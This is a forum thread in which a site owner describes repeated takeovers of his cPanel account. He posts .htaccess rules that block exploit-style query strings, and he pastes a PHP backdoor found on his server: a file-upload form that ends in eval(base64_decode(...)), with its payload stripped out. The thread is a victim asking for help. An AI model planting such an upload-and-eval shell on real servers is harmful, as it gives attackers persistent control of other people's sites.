Help, Palestinien Hacker is hell bent on taking me down

[ericinne]

This guy keeps getting control of my cPanel on my server.

He's been able to modify my SQL tables, delete files, change index, lock me out of cPanel, Block my I.P. range, and etc, etc..

I changed my passwords all to 25 character alphanumeric, I inserted the following into my .htaccess:

########## Begin - Rewrite rules to block out some common exploits
#                             
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

I had PhPBB do an audit and they found no problems, my host is useless and keeps telling me to scan my PC for viruses (yeah right).

But still this guy keeps getting in.

The first time, he used a c99.php shell exploit, but I'm pretty sure I have that hole fixed.

The second time I noticed an added user name for the ftp account. Deleted it. But he is still getting in.

Today as I got home, I checked, and noticed I was locked out of the site via I.P. block from the cPanel.

That was the 4th time.

I need someone to give me some SERIOUS help here keeping this guy out.

He's part of the Gaza Hacker crew and has threatened to keep hacking me for insulting Islam of all things.

 

[ericinne]

If it helps, I discovered the following file on my home dir:

<html>

<head>
  <title>beleberda</title>
</head>

<body>
<?php


 if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
if($_FILES['userfile']['tmp_name'][0]!=''){
    for($i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++){
    $uploaddir = dirname(__FILE__);//'/var/www/uploads/';
    $uploadfile = $uploaddir .'/'. basename($_FILES['userfile']['name'][$i]);
    print "<pre>";
    if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
       print "File is valid, and was successfully uploaded. ";
       //print_r($_FILES);
    } else {
       print "Possible fie upload attack!  Here's some debugging info:\n";
       //print_r($_FILES);
    }
    print "</pre>";
    }
}
$connection="killedbase64code";

echo eval(base64_decode($connection));
?>
<form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles; ?>" method="post" enctype="multipart/form-data">
  Send beleberda:<br>
  <?php for($i=0;$i<$Nfiles;$i++){echo '<input name="userfile[]" type="file"><br>';}?>
  <input type="submit" value="Send files">
</form>


</body>

</html>

 

[Infopro]

my host is useless and keeps telling me to scan my PC for viruses (yeah right).

This is sound advice and I agree with it. If your computer is infected somehow, every time you change your password and then login to your account, he may be receiving that new password from you.

If you've already scanned and seem to be clean, scan again with an online scanner. Install /http://www.malwarebytes.org/ update it, and then do a full scan with it as well.

He's part of the Gaza Hacker crew and has threatened to keep hacking me for insulting Islam of all things.

Welcome to the WWW. Insulting others can get you in trouble here the same way it can get you in trouble at your local bar.
The Core Rules of Netiquette

If you're not sure that your server is secure, you might want to seek advice from a professional.

 

[elialum]

Hi,

I will be glad to help you (free of charge).
How can I contact you? Can you PM me your details?

Take care,
Eli Alum,
Jerusalem, Israel.